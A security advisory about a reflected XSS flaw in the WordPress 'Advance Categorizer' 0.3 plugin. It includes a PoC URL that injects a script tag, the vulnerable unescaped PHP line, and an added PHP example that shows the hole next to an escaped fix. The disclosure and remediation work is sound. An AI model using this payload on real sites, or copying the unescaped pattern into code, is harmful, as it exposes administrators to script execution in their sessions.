Tuesday, 4 August 2015

Full title: WordPress Advance Categorizer 0.3 Cross Site Scripting Vulnerability
Date added: 04-08-2015
Category: web applications
Platform: php
Risk: Security Risk Low

Title: WordPress 'Advance Categorizer' Plugin
Version: 0.3
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-24
Download:
Notified WordPress: 2015-06-24
==========================================================
 
## Plugin description
==========================================================
Allows you to add multiple categories using comma separated text. You can also start via url "/wp-admin/post-new.php?cat=category1, category2, categor
 
## Reflected XSS vulnerabilities
==========================================================
The plugin is vulnerable to reflected XSS: the `cat` (and, as fallback, `categories`) request parameter is written into an HTML attribute without escaping, which allows an attacker who lures a logged-in admin to a crafted URL to execute arbitrary script in the admin panel.
 
PoC:
Log in as admin and visit this url: [URL]/wp-admin/post-new.php?cat=asdf"/><script>confirm(/Hackedihack/)</script>
 
Vulnerable code in file advance-categorizer.php:
 
L.61: ... value="<?=isset($_GET['cat'])?$_GET['cat']:(isset($_GET['categories'])?$_GET['categories']:'');?>" ...
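As an added illustration (not the plugin's code and not part of the original advisory), the stand-alone PHP below reproduces the reflection pattern from the quoted line next to the attribute-context escaping that closes it. The `render_vulnerable`/`render_hardened` function names and the `<input>` markup around the attribute are assumptions; the request value is the advisory's PoC payload as it reaches PHP after URL decoding, constructed inline.

```php
<?php
// Added example, not code from advance-categorizer.php. Runs stand-alone
// with `php example.php`; no WordPress installation is needed.

// Vulnerable rendering: mirrors the quoted plugin line. The request
// parameter is concatenated verbatim into a double-quoted value="" attribute.
function render_vulnerable(array $get): string {
    $cat = isset($get['cat']) ? $get['cat']
         : (isset($get['categories']) ? $get['categories'] : '');
    return '<input type="text" name="cat" value="' . $cat . '" />';
}

// Hardened rendering: escape for the HTML attribute context before output.
// ENT_QUOTES encodes both quote characters as well as <, > and &, so the
// value cannot terminate the attribute or the tag. Inside WordPress the
// idiomatic call for this context is esc_attr(); htmlspecialchars() is used
// here so the file runs without WordPress.
function render_hardened(array $get): string {
    $cat  = $get['cat'] ?? $get['categories'] ?? '';
    $safe = htmlspecialchars($cat, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="cat" value="' . $safe . '" />';
}

// Constructed request: the advisory's PoC payload, URL-decoded as PHP
// would see it in $_GET.
$request = ['cat' => 'asdf"/><script>confirm(/Hackedihack/)</script>'];

echo "vulnerable: ", render_vulnerable($request), PHP_EOL;
echo "hardened:   ", render_hardened($request), PHP_EOL;
```

In the vulnerable output the leading `"/>` closes the attribute and the `<input>` tag, so the following `<script>` element is parsed as markup and runs in the administrator's session. In the hardened output the same bytes appear as `&quot;/&gt;&lt;script&gt;...`, still a plain attribute value. Two points to check when applying the fix to the plugin itself: both sinks (`cat` and the `categories` fallback) must be escaped, and the escaping must match the output context; an attribute escape is the correct choice here only because the value lands inside a quoted attribute.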
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
 
# 0day.today [2015-08-04]
# fb.com/inj3ct0rs and twitter.com/inj3ct0r